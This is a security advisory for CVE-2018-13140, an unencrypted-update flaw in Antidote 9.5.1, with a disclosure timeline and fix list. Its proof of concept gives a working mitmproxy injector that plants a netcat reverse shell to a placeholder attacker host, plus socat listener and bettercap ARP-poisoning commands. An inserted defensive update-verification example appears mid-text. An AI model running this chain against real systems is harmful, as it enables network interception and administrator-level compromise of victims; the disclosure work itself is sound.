Antidote 9.5.1 Code Execution

Published: 21 Sep 2018 00:00:00
Reported by: Mickael Karatekin
Type: packetstorm
Source: packetstormsecurity.com

Antidote 9.5.1 Remote Code Execution Vulnerability through Unencrypted Updates with High Privilege

Related

| Source | Title | Published |
|---|---|---|
| 0day.today | Antidote 9.5.1 Code Execution Exploit | 22 Sep 2018 00:00 |
| Circl | CVE-2018-13140 | 22 Sep 2018 12:17 |
| CNVD | Antidote Remote Code Execution Vulnerability | 25 Sep 2018 00:00 |
| CVE | CVE-2018-13140 | 24 Sep 2018 22:00 |
| Cvelist | CVE-2018-13140 | 24 Sep 2018 22:00 |
| EUVD | EUVD-2018-5089 | 7 Oct 2025 00:30 |
| NVD | CVE-2018-13140 | 24 Sep 2018 22:29 |
| OSV | CVE-2018-13140 | 24 Sep 2018 22:29 |
| Prion | Remote code execution | 24 Sep 2018 22:29 |
# [CVE-2018-13140] Antidote Remote Code Execution against the update component
  
## Description  
  
Antidote is spell-checking software for the Windows, Linux and macOS
operating systems.
  
**Threat**  
  
The application's update component is affected by a remote code execution
vulnerability, which leads to code execution with high privileges on the
targeted system.
  
**Expectation**  
  
Network operations such as an update component's downloads should be carried
out over encrypted communication channels such as TLS, to prevent hijacking
attacks of all sorts.
  
## CVSS Score
  
**CVE ID**: CVE-2018-13140  
  
**Access Vector**: remote  
  
**Security Risk**: high  
  
**Vulnerability**: CWE-311  
  
**CVSS Base Score**: 8.2  
  
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L  
  
## Details
  
Antidote downloads its installation packages over plain HTTP, without any
kind of encryption such as TLS.

An attacker can thus perform a Man-In-The-Middle attack to intercept the
update request and response in order to replace or patch the downloaded
package.

Moreover, once the download is complete, the component asks for
administrator rights to install the update, which lets the attacker's
payload run with administrator privileges.
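As an added example (neither Druide's code nor part of the advisory), this is the shape of an update client that meets the expectation stated above: it refuses non-HTTPS update URLs, fetches over a certificate-verifying TLS context, and checks the package digest before handing it to the privileged installer. The update URL, the installer callback and the sample package are assumptions.

```python
import hashlib
import hmac
import ssl
import urllib.request
from urllib.parse import urlparse


class UpdateRejected(Exception):
    """Raised when an update must not reach the privileged installer."""


def check_update_url(url):
    # A plain-HTTP download is what let the update script be altered on
    # the wire, so anything but https:// is refused outright.
    parsed = urlparse(url)
    if parsed.scheme != "https" or not parsed.netloc:
        raise UpdateRejected("update URL must use https://, got %r" % url)
    return parsed


def fetch_update(url, timeout=30):
    check_update_url(url)
    # The default context verifies the server certificate chain and hostname.
    ctx = ssl.create_default_context()
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read()


def verify_package(package, expected_sha256):
    # expected_sha256 must come from a trusted source (release metadata
    # fetched over TLS, or better a signed manifest), never from the same
    # unauthenticated download; compare_digest avoids timing side channels.
    digest = hashlib.sha256(package).hexdigest()
    if not hmac.compare_digest(digest, expected_sha256.lower()):
        raise UpdateRejected("package digest mismatch: %s" % digest)
    return digest


def install_if_trusted(url, package, expected_sha256, installer):
    """Run the (privileged) installer only after both checks pass."""
    check_update_url(url)
    verify_package(package, expected_sha256)
    return installer(package)


# Constructed sample update script and the digest a vendor would publish
# with the release (computed here only because the sample is made up).
SAMPLE_PACKAGE = b"#!/bin/sh\nexport UPDATE_ROOT=/opt/app\n./apply-update\n"
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_PACKAGE).hexdigest()
```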
  
  
## Proof of Concept  
  
We developed a simple `mitmproxy` addon to exploit this vulnerability; here
is the Python source code:
  
```python
# (this script works best with --anticache)

from mitmproxy import http

# String looked for in every HTTP response body
MATCH = "export "
# Command inserted just before that string (IP_OF_ATTACKER is a placeholder)
CMD_TO_INJECT = "nc -e /bin/bash IP_OF_ATTACKER 4444&"


class Injector:
    def response(self, flow: http.HTTPFlow) -> None:
        # Only responses containing the marker string are modified
        if MATCH.encode() in flow.response.content:
            print("Match detected")
            cmd = "\n%s\n%s" % (CMD_TO_INJECT, MATCH)
            flow.response.content = flow.response.content.replace(
                MATCH.encode(), cmd.encode())


addons = [Injector()]
```
  
The previous script looks for the `export ` string in each HTTP response
and replaces it with a simple command that gives the attacker a remote
reverse shell. When the update script is then run by the update component,
the command is first executed as the unprivileged user. The update script
then asks the user for the administrator password, which allows our command
to be executed as administrator as well.
  
We can thus obtain two remote shells (as unprivileged user and as
administrator) using a multithreaded listening TCP handler:

* the first one when the script is started (user privileges);

* the second one after the victim types their credentials (administrator
privileges).
  
The following commands are used to exploit the vulnerability, using a  
Man-In-The-Middle attack:  
  
* a multithreaded `socat` TCP listener, to receive the victim reverse  
connection with low privileges against the target:  
  
```shell
socat - TCP-LISTEN:4444,fork
```
  
* the mitm-proxy with our dedicated module:  
  
```shell
mitmproxy -s antidote.py --anticache --listen-port 9090 -m transparent
```
  
* ARP Cache Poisoning using bettercap and redirecting traffic to mitm-proxy:  
  
```shell
bettercap -I YOUR_NETWORK_INTERFACE -T VICTIM_IP_ADDRESS --custom-proxy \
    YOUR_IP_ADDRESS --custom-proxy-port 9090 -S ARP
```
  
When Antidote checks for an update, `mitmproxy` automatically patches the
downloaded update component so that it includes our reverse shell payload.

Once the download completes, the user clicks `install`, which triggers the
execution of the two payloads as described above.
  
## Timeline (dd/mm/yyyy)  
  
Congratulations to Druide for handling this security response very  
quickly and professionally:  
  
* 30/04/2018 : Initial discovery.  
* 30/04/2018 : Contact acknowledgment.  
* 11/05/2018 : Detailed report communicated to Druide.  
* 12/05/2018 : Technical response, confirming the vulnerability and  
stating which versions are affected (Windows, Linux, but not Mac OS).  
* 08/06/2018 : Follow up e-mail from Druide informing about the patching  
development status and roadmap.  
* 23/06/2018 : Druide informs us of the fixed versions and suggests a
disclosure date of 31/07/2018 to leave customers enough time to patch.
* 21/09/2018 : Disclosure.  
  
## Fixes  
  
* Antidote 9.5.2 (Windows/Linux)  
* Antidote 8.5.2 (Windows)  
* Antidote HD 6.1.2 (Windows)  
  
## Affected versions  
  
* All Antidote Windows/Linux versions <= 9.5.1  
* Mac OS versions are unaffected (already using TLS encryption for updates)  
  
## Credits  
  
* Mickael KARATEKIN <m.karatekin -at- sysdream.com>  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  